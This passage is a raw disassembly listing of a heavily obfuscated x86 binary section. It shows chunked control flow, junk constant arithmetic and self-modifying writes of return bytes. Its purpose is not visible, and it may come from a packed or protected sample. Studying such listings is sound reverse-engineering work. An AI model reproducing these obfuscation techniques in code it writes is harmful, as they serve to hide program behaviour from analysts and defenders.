		add	edx, 0EFB1C6A8h
		mov	[edx], eax
		pop	edx
		lea	eax, nullsub_190
		push	offset loc_457F38
		jmp	locret_4427AC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_232. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	ebp, edi
		jmp	sub_43ECAA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_93. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43AB8F:				; CODE XREF: hvvrg7ie:0045A01Fj
		jmp	locret_4553F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E027

loc_43AB94:				; CODE XREF: sub_43E027+11j
		jmp	loc_44A443
; END OF FUNCTION CHUNK	FOR sub_43E027

; =============== S U B	R O U T	I N E =======================================



sub_43AB99	proc near		; CODE XREF: hvvrg7ie:0043ABBAj
					; sub_45889B+7p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439388 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043A405 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D8C9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E1EE SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043FD47 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043FF53 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00441BF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004449FD SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044622B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448395 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449FFE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AAD4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044B543 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044B7F0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C334 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D9C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DFFF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044E34A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454D96 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00455689 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00458C60 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00459315 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045A358 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045AC0D SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	esp, 0FFFFFFF8h
		call	sub_448768
		test	al, al
		jz	loc_44AAD4
		jmp	loc_44E34A
sub_43AB99	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 8A0Fh
; ---------------------------------------------------------------------------
		xchg	eax, ebx
		add	eax, 0CA030001h
		jmp	sub_43AB99
; ---------------------------------------------------------------------------

loc_43ABBF:				; CODE XREF: hvvrg7ie:00456264j
		jnz	loc_455476
		jmp	loc_453BEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458746

loc_43ABCA:				; CODE XREF: sub_458746-10B29j
					; hvvrg7ie:00451A65j
		rol	edx, 0Bh
		or	edx, ds:4000FAh
		rol	edx, 0Ch
		xor	edx, 0B6DFEFF3h
		xchg	edx, [esp+0]
		jmp	loc_445514
; END OF FUNCTION CHUNK	FOR sub_458746

; =============== S U B	R O U T	I N E =======================================



sub_43ABE4	proc near		; CODE XREF: hvvrg7ie:loc_4506AAj
					; DATA XREF: hvvrg7ie:004506A0o
		mov	[edx], eax
		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		lea	eax, nullsub_23
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_23
sub_43ABE4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43ABFA:				; CODE XREF: hvvrg7ie:004573C4j
		mov	eax, [esp]
		push	edx
		jmp	loc_453BD2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_344. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43AC04:				; CODE XREF: hvvrg7ie:0044581Cj
		xchg	ebp, ecx

loc_43AC06:				; CODE XREF: hvvrg7ie:loc_4457F9j
		push	offset loc_4542D7
		jmp	locret_43E52B
; ---------------------------------------------------------------------------

loc_43AC10:				; CODE XREF: hvvrg7ie:0043991Ej
		js	loc_459203
		xor	ebx, eax
		xor	edx, edi
		jl	loc_43A040
		jmp	loc_448981
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450810

loc_43AC25:				; CODE XREF: sub_450810+9351j
		jl	loc_44B99D
; END OF FUNCTION CHUNK	FOR sub_450810
; START	OF FUNCTION CHUNK FOR sub_45028F

loc_43AC2B:				; CODE XREF: sub_45028F+16j
		jmp	loc_443A68
; END OF FUNCTION CHUNK	FOR sub_45028F
; ---------------------------------------------------------------------------
		sub	ebx, 5E22897Dh
		jmp	loc_44B990

; =============== S U B	R O U T	I N E =======================================



sub_43AC3B	proc near		; CODE XREF: hvvrg7ie:0043B6A0j
					; sub_450246-DF1Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004412C8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448783 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449F3F SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044D373 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DAF8 SIZE 0000001F BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, ebp
		add	eax, 0AD051F7Bh
		mov	eax, [eax]
		popf
		add	eax, 0F924AE0h
		push	ecx
		jmp	loc_448783
sub_43AC3B	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_77. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43AC57:				; CODE XREF: hvvrg7ie:0044CA72j
		jmp	loc_452EC7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_43AC5C:				; CODE XREF: sub_43EBB6+88B0j
		jmp	loc_4435DD
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_43AC61:				; CODE XREF: sub_44C6D7-5726j
		jmp	loc_43AC6B
; END OF FUNCTION CHUNK	FOR sub_44C6D7
; ---------------------------------------------------------------------------

loc_43AC66:				; CODE XREF: hvvrg7ie:0043EF6Cj
		jmp	loc_44B739
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_43AC6B:				; CODE XREF: sub_44C6D7:loc_43AC61j
		push	offset sub_4504AD
		jmp	nullsub_385
; END OF FUNCTION CHUNK	FOR sub_44C6D7
; ---------------------------------------------------------------------------
		and	edi, 0F7E2F841h
		jmp	sub_44AB2D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_157. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D23

loc_43AC81:				; CODE XREF: sub_454D23:loc_44A179j
		add	edx, 3E88D9h
		xchg	edx, [esp+8+var_8]
		jmp	sub_456423
; END OF FUNCTION CHUNK	FOR sub_454D23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4525FC

loc_43AC8F:				; CODE XREF: sub_4525FC:loc_43EECFj
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		mov	[ebp+var_4], eax
		push	4DC5240Ah
		jmp	loc_453124
; END OF FUNCTION CHUNK	FOR sub_4525FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450810

loc_43ACA2:				; CODE XREF: sub_450810:loc_45081Bj
		lea	eax, loc_45B635
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B635
; END OF FUNCTION CHUNK	FOR sub_450810
; ---------------------------------------------------------------------------
		push	ecx
		push	0C042A528h
		pop	ecx

loc_43ACB7:				; CODE XREF: hvvrg7ie:004540DFj
		jmp	loc_4597D3
; ---------------------------------------------------------------------------

locret_43ACBC:				; CODE XREF: hvvrg7ie:00448683j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_43ACBD:				; CODE XREF: sub_43B6A5+1ACF2j
		jmp	loc_44C7A0
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44646D

loc_43ACC2:				; CODE XREF: sub_44646D+7722j
		add	edi, 91B90248h
		xor	edx, 350A5321h
		jz	loc_44431A

loc_43ACD4:				; CODE XREF: sub_44646D:loc_440E06j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_44A909
; END OF FUNCTION CHUNK	FOR sub_44646D
; ---------------------------------------------------------------------------
		js	loc_446F75
		jmp	loc_43CCC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F5B

loc_43ACEA:				; CODE XREF: sub_445F5B+12j
					; hvvrg7ie:loc_449805j
		mov	eax, [eax]
		pop	ecx
		xchg	eax, [esp-4+arg_0]
		adc	ebp, 2A3005B0h
		jmp	loc_44B61B
; END OF FUNCTION CHUNK	FOR sub_445F5B
; ---------------------------------------------------------------------------
		mov	eax, ds:dword_44EE2C
		push	offset sub_43CD0B
		jmp	locret_455A3E
; ---------------------------------------------------------------------------

loc_43AD0A:				; CODE XREF: hvvrg7ie:004586CFj
		mov	ebp, eax
		pop	eax
		retn
; ---------------------------------------------------------------------------

loc_43AD0E:				; CODE XREF: hvvrg7ie:0044E1BBj
		jmp	nullsub_495
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449785

loc_43AD13:				; CODE XREF: sub_449785+Aj
		jmp	loc_447506
; END OF FUNCTION CHUNK	FOR sub_449785
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_43AD18:				; CODE XREF: sub_43EBB6+4A39j
		jmp	loc_444A92
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_43AD1D:				; CODE XREF: sub_44388C:loc_459491j
		mov	eax, ds:dword_448D10
		mov	edx, [ebp-4]

loc_43AD25:				; CODE XREF: sub_44388C:loc_43F46Cj
		mov	byte ptr [eax+edx], 0
		inc	dword ptr [ebp-4]
		cmp	dword ptr [ebp-4], 100h
		jmp	loc_459E6D
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------

loc_43AD38:				; CODE XREF: hvvrg7ie:0043EDB8j
		js	loc_441F68

; =============== S U B	R O U T	I N E =======================================



sub_43AD3E	proc near		; CODE XREF: sub_44C9B0-446Ap
		xchg	edx, [esp+0]
		pop	edx
		mov	[ebp-0Ch], eax
		shl	dword ptr [ebp-8], 8
sub_43AD3E	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_451F50

loc_43AD49:				; CODE XREF: sub_451F50:loc_4503B2j
					; sub_44C9B0:loc_450820j
		jno	loc_447010
		mov	eax, [ebp-0Ch]
		jmp	loc_446FF6
; END OF FUNCTION CHUNK	FOR sub_451F50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480B3

loc_43AD57:				; CODE XREF: sub_4480B3+11j
		add	edi, 68E3A66Bh
		jnb	loc_456BA6
; END OF FUNCTION CHUNK	FOR sub_4480B3
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43AD63:				; CODE XREF: sub_43F227+A6B2j
		jmp	nullsub_140
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414D3

loc_43AD68:				; CODE XREF: sub_4414D3+82D4j
		jmp	loc_441EF0
; END OF FUNCTION CHUNK	FOR sub_4414D3
; ---------------------------------------------------------------------------
		rol	eax, 4
		xor	esi, 4A9BFF27h
		jmp	loc_456BA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A87E

loc_43AD7B:				; CODE XREF: sub_44A87E-D4CEj
		add	eax, 3Ch
		mov	eax, [eax]
		add	eax, [ebp-4]
		push	offset sub_440402
		jmp	nullsub_130
; END OF FUNCTION CHUNK	FOR sub_44A87E
; ---------------------------------------------------------------------------

loc_43AD8D:				; CODE XREF: hvvrg7ie:00459F5Cj
		pushf
		and	esi, 0C336E2B7h
		cmp	esi, ecx
		jmp	loc_44B770
; ---------------------------------------------------------------------------

loc_43AD9B:				; DATA XREF: sub_43E9D6+5C7Eo
		mov	al, [eax]
		jnb	loc_445B69
		sub	al, 99h
		mov	edx, [ebp-4]
		jmp	loc_44B713
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_43ADAD:				; CODE XREF: sub_448DE4:loc_4477F0j
		push	35591CAh
		pop	edi
		sub	edi, 0B46A6E25h
		xor	edi, 18598A58h
		jmp	loc_45877F
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------

locret_43ADC4:				; CODE XREF: hvvrg7ie:00451505j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408FA

loc_43ADC5:				; CODE XREF: sub_4408FA+5j
		jmp	loc_43B3D3
; END OF FUNCTION CHUNK	FOR sub_4408FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B72C

loc_43ADCA:				; CODE XREF: sub_45B72C+9j
		rol	eax, 1
		add	eax, 0C9368C79h
		push	offset loc_45744A
		jmp	nullsub_548
; END OF FUNCTION CHUNK	FOR sub_45B72C
; ---------------------------------------------------------------------------

locret_43ADDC:				; CODE XREF: hvvrg7ie:004526B9j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439E6C

loc_43ADDD:				; CODE XREF: sub_439E6C+1EDCAj
		jmp	nullsub_344
; END OF FUNCTION CHUNK	FOR sub_439E6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_43ADE2:				; CODE XREF: sub_450E01-7F63j
		jmp	loc_442D01
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_43ADE7:				; CODE XREF: sub_451D60-12326j
		jmp	loc_43FA45
; END OF FUNCTION CHUNK	FOR sub_451D60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43ADEC:				; CODE XREF: sub_44191F:loc_43FAA9j
		push	4BE3359Ch
		pop	eax
		add	eax, 0B9B07AEDh
		jns	loc_43AE7D

locret_43ADFE:				; CODE XREF: sub_44388C:loc_45B1D6j
		retn
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4419C0

loc_43ADFF:				; CODE XREF: sub_4419C0+17E4Fj
		jmp	loc_44E2AD
; END OF FUNCTION CHUNK	FOR sub_4419C0
; ---------------------------------------------------------------------------
		xor	edx, 6E4FD2FBh
		jmp	sub_444E8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B99

loc_43AE0F:				; CODE XREF: sub_448B99+Cj
		mov	eax, [ebp-4]
		call	sub_453CDE
		mov	edx, [ebp-8]
		push	offset loc_443155
		jmp	nullsub_255
; END OF FUNCTION CHUNK	FOR sub_448B99

; =============== S U B	R O U T	I N E =======================================



sub_43AE24	proc near		; DATA XREF: sub_44FF13+Ao

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C18A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004428DE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EBAB SIZE 00000018 BYTES

		lea	eax, loc_4451E2
		push	edx
		push	4476719h
		xchg	ecx, [esp+8+var_8]
		mov	edx, ecx
		pop	ecx
		xor	edx, 0D227C7E8h
		jmp	loc_43C18A
sub_43AE24	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43AE41	proc near		; DATA XREF: hvvrg7ie:00454F87o

; FUNCTION CHUNK AT 004390F1 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00443C84 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444588 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004483B3 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00449E37 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D441 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451260 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00454DE8 SIZE 00000007 BYTES

		mov	[ecx], eax
		pop	ecx
		cmp	dword ptr [ebp-8], 0
		jz	loc_4434FE
		jmp	loc_444588
sub_43AE41	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF96

loc_43AE53:				; CODE XREF: sub_43AF96:loc_43AFA2j
		jz	loc_455459
		jmp	loc_44CC16
; END OF FUNCTION CHUNK	FOR sub_43AF96
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_43AE5E:				; CODE XREF: sub_4544DD:loc_45209Dj
		xchg	ebp, [esp+0Ch+var_C]
		push	0DDB01995h
		pop	ecx
		and	ecx, 204E33D5h
		add	ecx, (offset loc_447B5A+1)
		mov	[ecx], eax
		pop	ecx
		push	0
		jmp	loc_45AE49
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43AE7D:				; CODE XREF: sub_44191F-6B27j
					; sub_43B6A5+3560j
		sub	eax, 679E8BC8h
		rol	eax, 11h
		xor	eax, 3535B852h
		add	eax, ebp
		add	eax, 83497C38h
		jmp	loc_447CCF
; END OF FUNCTION CHUNK	FOR sub_44191F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_390. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CC8

loc_43AE9A:				; CODE XREF: sub_449CC8+5BFAj
		add	eax, 65A5D595h

loc_43AEA0:				; CODE XREF: hvvrg7ie:loc_44FA4Dj
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_449EA9
		jmp	loc_457C8C
; END OF FUNCTION CHUNK	FOR sub_449CC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_43AEB0:				; CODE XREF: sub_455087-18E43j
		jz	loc_45A22A
		jmp	loc_45830B
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456118

loc_43AEBB:				; CODE XREF: sub_456118+8j
		push	10h
		call	sub_443B00

loc_43AEC2:				; CODE XREF: sub_454099:loc_44CADAj
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_456118
; ---------------------------------------------------------------------------

loc_43AEC4:				; CODE XREF: hvvrg7ie:00451009j
		jmp	loc_43BA05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C2D

loc_43AEC9:				; CODE XREF: sub_449C2D+9j
		jmp	sub_444034
; END OF FUNCTION CHUNK	FOR sub_449C2D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414D3

loc_43AECE:				; CODE XREF: sub_4414D3+4j
		rol	eax, 10h
		push	eax
		push	eax
		push	1F2F1F73h
		jmp	loc_449794
; END OF FUNCTION CHUNK	FOR sub_4414D3
; ---------------------------------------------------------------------------

loc_43AEDD:				; CODE XREF: hvvrg7ie:0044F771j
		jle	loc_45AE7C
		sub	eax, esi
		jmp	sub_44CB41
; ---------------------------------------------------------------------------
		push	ebx
		jmp	loc_43E0FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_43AEF0:				; CODE XREF: sub_4500FA+8j
		xchg	eax, [esp+0]
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:dword_43D6F4, 0
		jnz	loc_440F66
		jmp	loc_452356
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_43AF0A:				; CODE XREF: sub_45038B-5AAEj
		add	ecx, 23CF1765h
		mov	ecx, [ecx]
		xchg	ecx, [esp+0]
		push	dword ptr [ebp+0Ch]
		push	esi
		push	0B5A5D0DDh
		pop	esi
		add	esi, 32D4E5E8h
		jmp	loc_44B0AE
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------

loc_43AF2A:				; CODE XREF: hvvrg7ie:loc_44427Aj
		jg	loc_43E132

; =============== S U B	R O U T	I N E =======================================



sub_43AF30	proc near		; CODE XREF: hvvrg7ie:0044E94Dp

; FUNCTION CHUNK AT 0043CD8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441A1A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004494E9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044DFB3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451E9A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B18C SIZE 00000006 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	19168A81h
		xchg	ebx, [esp+0]
		jmp	loc_44DFB3
sub_43AF30	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43AF41:				; CODE XREF: hvvrg7ie:loc_457F00j
		pop	esi
		push	offset sub_43F7AE
		jmp	loc_452BF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44048E

loc_43AF4C:				; CODE XREF: sub_44048E+D0DCj
		sbb	edi, 0D9B53E2Fh
; END OF FUNCTION CHUNK	FOR sub_44048E

; =============== S U B	R O U T	I N E =======================================



sub_43AF52	proc near		; CODE XREF: sub_44048E:loc_43A364j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043FC0D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00440A14 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004470BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C2F8 SIZE 00000010 BYTES

		push	ebp
		mov	ebp, esi
		xchg	ebp, [esp+4+var_4]
		push	362A694Dh
		pop	esi
		xor	esi, 0FD0B3ED2h
		jmp	loc_440A14
sub_43AF52	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_43AF69:				; CODE XREF: sub_450590:loc_43B75Ej
		or	edi, 2CF59E7Ah
		sub	edi, 25D67B5Ah
		add	edi, 7925B0FDh
		xchg	edi, [esp+0]
		jmp	loc_44D428
; END OF FUNCTION CHUNK	FOR sub_450590
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E23

loc_43AF83:				; CODE XREF: sub_441E23:loc_447E8Bj
		rol	ebx, 0Eh
		jmp	loc_44DF3C
; END OF FUNCTION CHUNK	FOR sub_441E23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_43AF8B:				; CODE XREF: sub_44059F+6037j
		jge	loc_45022A
		jmp	loc_4471A0
; END OF FUNCTION CHUNK	FOR sub_44059F

; =============== S U B	R O U T	I N E =======================================



sub_43AF96	proc near		; CODE XREF: sub_451669:loc_4479CBp
					; hvvrg7ie:0044BA16j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043AE53 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441D60 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044CC16 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00451539 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455456 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00455BAD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B7C9 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [esp-4+arg_0]
		call	sub_43D2D8

loc_43AFA2:				; CODE XREF: sub_454099+3575j
		jmp	loc_43AE53
sub_43AF96	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455D5E

loc_43AFA7:				; CODE XREF: sub_455D5E+7j
		jmp	nullsub_11
; END OF FUNCTION CHUNK	FOR sub_455D5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4533F2

loc_43AFAC:				; CODE XREF: sub_4533F2-553Ej
		jmp	loc_45B49A
; END OF FUNCTION CHUNK	FOR sub_4533F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_43AFB1:				; CODE XREF: sub_44B7CB-3535j
		jmp	nullsub_17
; END OF FUNCTION CHUNK	FOR sub_44B7CB

; =============== S U B	R O U T	I N E =======================================



sub_43AFB6	proc near		; CODE XREF: sub_44612F+11p
					; hvvrg7ie:0045AB3Dj

; FUNCTION CHUNK AT 00439A4B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044831B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A148 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004568F3 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		jnz	loc_44831B
		call	nullsub_22
		call	sub_44DE0A
		mov	edx, 0CF0182F6h
		call	sub_448A18

loc_43AFD4:				; CODE XREF: sub_43F227+15117j
		jmp	loc_4568F3
sub_43AFB6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43AFD9:				; CODE XREF: hvvrg7ie:004422ECj
		jz	loc_45A174
		jmp	loc_458260
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_43AFE4:				; CODE XREF: sub_4554E8:loc_44D522j
		xchg	esi, [esp+0]
		call	sub_44612F
		or	eax, eax
		jnz	loc_456D2E
		jmp	loc_443A9F
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------

loc_43AFF9:				; CODE XREF: hvvrg7ie:00448235j
		jno	loc_4584C1
		sbb	ebx, 0EFADF7BEh
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_43B005:				; CODE XREF: sub_43E128:loc_44821Aj
		and	esi, 0BD54692Ah
		or	esi, 303AEBBCh
		xor	esi, 387EEBBCh
		xchg	esi, [esp+0]
		jmp	loc_44FBC0
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------

loc_43B01F:				; CODE XREF: hvvrg7ie:0044D217j
		mov	eax, [esp]
		push	edx
		call	sub_44F7CF
		mov	eax, 86480F55h
		call	sub_450C5A
		mov	ds:dword_41D0C4, eax
		lea	eax, nullsub_503
		jmp	loc_44D2B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_43B043:				; CODE XREF: sub_44370F:loc_451F2Dj
		mov	eax, [esp+0]
		push	edx
		push	esi
		push	0FD959CE0h
		pop	esi
		and	esi, 0A6AAEE45h
		test	esi, 8000000h
		jmp	loc_440C39
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------
		shr	esi, 4
		jmp	sub_43D964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_43B067:				; CODE XREF: sub_450F97:loc_45B12Cj
		or	eax, 56C5AC62h
		sub	eax, 0F93A33FAh
		or	eax, 0AF0E1358h
		xor	eax, 0E92C8800h
		add	eax, 53142F2Ch
		add	eax, ebp
		jmp	loc_456B70
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
		and	ebx, ecx
		jmp	sub_44C267
; ---------------------------------------------------------------------------
		sub	ecx, 52F8658Bh
		jmp	loc_447AD8
; ---------------------------------------------------------------------------

loc_43B09E:				; CODE XREF: hvvrg7ie:loc_4451D5j
		push	esi
		sbb	ebx, esi
		jmp	loc_447172
; ---------------------------------------------------------------------------
		jle	loc_447D27
		shr	edx, 7
		jmp	sub_44E6B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D47E

loc_43B0B4:				; CODE XREF: sub_43D47E:loc_43D64Ej
		pop	edx
		call	sub_4496FA

loc_43B0BA:				; CODE XREF: hvvrg7ie:0044728Ej
		jge	loc_44490C
		xchg	eax, edx
		jns	loc_44B42B
		not	ecx
		jmp	loc_44490A
; END OF FUNCTION CHUNK	FOR sub_43D47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC1D

loc_43B0CF:				; CODE XREF: sub_43FC1D+1Fj
		call	sub_44241C

loc_43B0D4:				; CODE XREF: sub_4574EE:loc_4574FEj
		jmp	loc_4581B3
; END OF FUNCTION CHUNK	FOR sub_43FC1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C354

loc_43B0D9:				; CODE XREF: sub_43C354+F9Dj
		jg	loc_4514F2
		sbb	ebp, 67581873h

loc_43B0E5:				; CODE XREF: sub_43C354:loc_44B960j
		push	edi
		push	3D9F217Dh
		jmp	loc_44EA6A
; END OF FUNCTION CHUNK	FOR sub_43C354
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44261C

loc_43B0F0:				; CODE XREF: sub_44261C:loc_44475Aj
		call	sub_458D36
		mov	eax, 3FFC3041h
		call	sub_450C5A
		push	ebx
		push	offset sub_44EBE1
		jmp	nullsub_552
; END OF FUNCTION CHUNK	FOR sub_44261C
